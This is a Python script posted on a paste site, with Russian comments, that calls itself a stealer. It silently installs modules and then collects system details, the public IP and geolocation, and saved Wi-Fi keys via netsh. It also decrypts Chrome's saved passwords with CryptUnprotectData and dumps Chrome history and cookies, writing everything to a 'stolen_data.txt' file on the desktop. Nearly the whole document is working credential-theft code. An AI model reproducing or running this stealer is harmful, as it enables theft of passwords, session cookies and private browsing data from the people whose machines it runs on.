https://pastein.ru/t/5Uq
Загрузка данных
import subprocess
import sys
import os
import platform
import urllib.request
import json
import traceback
import sqlite3
import shutil
import tempfile
from datetime import datetime
import getpass
import socket
# Пытаемся определить реальный рабочий стол
DESKTOP_CANDIDATES = [
r"C:\Users\lazut\OneDrive\Desktop",
r"C:\Users\lazut\Desktop",
os.path.join(os.path.expanduser('~'), 'Desktop')
]
DESKTOP_PATH = None
for path in DESKTOP_CANDIDATES:
if os.path.isdir(path):
DESKTOP_PATH = path
break
if not DESKTOP_PATH:
# Если вообще ничего не найдено, создаём папку OneDrive\Desktop принудительно
DESKTOP_PATH = r"C:\Users\lazut\OneDrive\Desktop"
os.makedirs(DESKTOP_PATH, exist_ok=True)
LOG_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), "log.txt")
def log(msg):
with open(LOG_PATH, 'a', encoding='utf-8') as f:
f.write(str(msg) + '\n')
print(msg)
def install(package):
subprocess.check_call([sys.executable, "-m", "pip", "install", package],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
# Автоустановка модулей
for mod_name, pip_name in [('browser_cookie3', 'browser_cookie3'), ('win32crypt', 'pypiwin32'), ('winreg', None)]:
try:
if pip_name:
__import__(mod_name)
except ImportError:
if pip_name:
log(f"Устанавливаю {pip_name}...")
install(pip_name)
__import__(mod_name)
import browser_cookie3
import win32crypt
import winreg
CHROME_HISTORY_DB = os.path.expanduser(r'~\AppData\Local\Google\Chrome\User Data\Default\History')
CHROME_LOGIN_DB = os.path.expanduser(r'~\AppData\Local\Google\Chrome\User Data\Default\Login Data')
def get_processor():
return platform.processor()
def get_graphics():
try:
cmd = 'powershell -Command "Get-WmiObject Win32_VideoController | Select-Object -ExpandProperty Name"'
out = subprocess.check_output(cmd, shell=True, encoding='utf-8', errors='ignore')
return out.strip() or "Не найдено"
except Exception as e:
return f"Ошибка видяхи: {e}"
def get_ip():
try:
with urllib.request.urlopen('https://api.ipify.org', timeout=5) as r:
return r.read().decode()
except Exception as e:
return f"IP не взят: {e}"
def get_geolocation(ip):
try:
with urllib.request.urlopen(f'http://ip-api.com/json/{ip}', timeout=5) as r:
data = json.loads(r.read().decode())
return f"{data.get('city','?')}, {data.get('country','?')}, {data.get('isp','?')}"
except Exception as e:
return f"Гео провал: {e}"
def steal_chrome_cookies():
try:
cookies = browser_cookie3.chrome()
if not cookies:
return "Куки пусты"
return "\n".join([f"{c.domain}\t{c.name}\t{c.value}" for c in cookies])
except Exception as e:
return f"Куки провал: {e}"
def get_system_info():
return f"""Пользователь: {getpass.getuser()}
Имя ПК: {socket.gethostname()}
ОС: {platform.platform()}
Архитектура: {platform.architecture()[0]}"""
def get_disk_info():
info = ""
for d in 'CDEFGHIJKLMNOPQRSTUVWXYZ':
p = d + ':\\'
if os.path.exists(p):
try:
size = subprocess.check_output(f'wmic logicaldisk where "DeviceID=\'{d}:\'" get Size',
shell=True, encoding='cp866', errors='ignore')
free = subprocess.check_output(f'wmic logicaldisk where "DeviceID=\'{d}:\'" get FreeSpace',
shell=True, encoding='cp866', errors='ignore')
info += f"{d}: Всего {size.split()[-1]} байт, Свободно {free.split()[-1]} байт\n"
except:
info += f"{d}: Не прочитать\n"
return info.strip()
def get_wifi_passwords():
try:
profiles = subprocess.check_output('netsh wlan show profiles', shell=True,
encoding='cp866', errors='ignore')
output = ""
for line in profiles.split('\n'):
if ":" in line and "Все" not in line and "User" not in line:
name = line.split(":")[1].strip()
if name:
key = subprocess.check_output(f'netsh wlan show profile name="{name}" key=clear',
shell=True, encoding='cp866', errors='ignore')
for kline in key.split('\n'):
if "Содержимое ключа" in kline or "Key Content" in kline:
pwd = kline.split(":")[1].strip()
output += f"WiFi: {name} -> {pwd}\n"
break
return output or "Нет профилей или нужны права админа"
except Exception as e:
return f"WiFi пароли: {e}"
def get_running_processes():
try:
out = subprocess.check_output('tasklist /fo csv /nh', shell=True,
encoding='cp866', errors='ignore')
return out[:2000] + ("..." if len(out)>2000 else "")
except Exception as e:
return f"Процессы: {e}"
def get_installed_programs():
programs = []
keys = [
r"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall",
r"SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall"
]
for key_path in keys:
try:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key_path) as key:
for i in range(0, winreg.QueryInfoKey(key)[0]):
subkey_name = winreg.EnumKey(key, i)
with winreg.OpenKey(key, subkey_name) as subkey:
try:
name = winreg.QueryValueEx(subkey, "DisplayName")[0]
programs.append(name)
except:
continue
except:
continue
programs = sorted(set(programs))
return "\n".join(programs) if programs else "Не удалось получить список"
def steal_chrome_history(max_rows=500):
if not os.path.exists(CHROME_HISTORY_DB):
return "Файл истории не найден (Chrome закрыт?)"
try:
tmp = tempfile.NamedTemporaryFile(delete=False, suffix=".db")
shutil.copy2(CHROME_HISTORY_DB, tmp.name)
conn = sqlite3.connect(tmp.name)
cur = conn.cursor()
cur.execute("SELECT url, title, last_visit_time FROM urls ORDER BY last_visit_time DESC LIMIT ?", (max_rows,))
rows = cur.fetchall()
conn.close()
os.unlink(tmp.name)
if not rows:
return "История пуста"
output = ""
for url, title, timestamp in rows:
dt = datetime(1601, 1, 1) + datetime.timedelta(microseconds=timestamp) if timestamp else datetime.min
output += f"{dt.strftime('%Y-%m-%d %H:%M')} | {title[:50] if title else '?'} | {url}\n"
return output
except Exception as e:
return f"Ошибка истории: {e}"
def steal_chrome_passwords():
if not os.path.exists(CHROME_LOGIN_DB):
return "Файл паролей не найден"
try:
tmp = tempfile.NamedTemporaryFile(delete=False, suffix=".db")
shutil.copy2(CHROME_LOGIN_DB, tmp.name)
conn = sqlite3.connect(tmp.name)
cur = conn.cursor()
cur.execute("SELECT origin_url, username_value, password_value FROM logins")
rows = cur.fetchall()
conn.close()
os.unlink(tmp.name)
if not rows:
return "Пароли отсутствуют"
output = ""
for url, user, pwd_blob in rows:
password = "Не расшифровать"
try:
password = win32crypt.CryptUnprotectData(pwd_blob, None, None, None, 0)[1].decode('utf-8', errors='replace')
except:
pass
output += f"{url} | {user} | {password}\n"
return output
except Exception as e:
return f"Ошибка паролей: {e}"
def main():
try:
log("=== Старт стиллера ===")
log(f"Определён рабочий стол: {DESKTOP_PATH}")
# Проверка и создание папки рабочего стола, если её нет (на случай, если OneDrive глючит)
os.makedirs(DESKTOP_PATH, exist_ok=True)
# Тестовый файл, чтобы убедиться, что запись вообще работает
test_file = os.path.join(DESKTOP_PATH, "test_created.txt")
with open(test_file, 'w') as f:
f.write("Этот файл создан стиллером. Если видишь его, скрипт сработал.")
log(f"Тестовый файл создан: {test_file}")
# Основной файл
filepath = os.path.join(DESKTOP_PATH, "stolen_data.txt")
ip = get_ip()
data = f"""[] RAGE MODE [] EXTENDED STEALER (без UUID)
Дата: {datetime.now()}
{get_system_info()}
IP: {ip}
Геолокация: {get_geolocation(ip)}
Процессор: {get_processor()}
Видеокарта: {get_graphics()}
=== ДИСКИ ===
{get_disk_info()}
=== ПАРОЛИ Wi-Fi ===
{get_wifi_passwords()}
=== ЗАПУЩЕННЫЕ ПРОЦЕССЫ ===
{get_running_processes()}
=== УСТАНОВЛЕННЫЕ ПРОГРАММЫ ===
{get_installed_programs()}
=== ИСТОРИЯ CHROME (последние 500) ===
{steal_chrome_history(500)}
=== ПАРОЛИ CHROME ===
{steal_chrome_passwords()}
=== КУКИ CHROME ===
{steal_chrome_cookies()}
"""
with open(filepath, 'w', encoding='utf-8') as f:
f.write(data)
log(f"Основной файл успешно создан: {filepath}")
except Exception as e:
log(f"ПИЗДЕЦ ОШИБКА: {e}")
log(traceback.format_exc())
# Экстренный сброс в корень пользователя
fallback = os.path.join(os.path.expanduser('~'), "STOLEN_EMERGENCY.txt")
with open(fallback, 'w', encoding='utf-8') as f:
f.write("Крах стиллера:\n" + traceback.format_exc())
log(f"Аварийный файл в {fallback}")
if __name__ == "__main__":
main()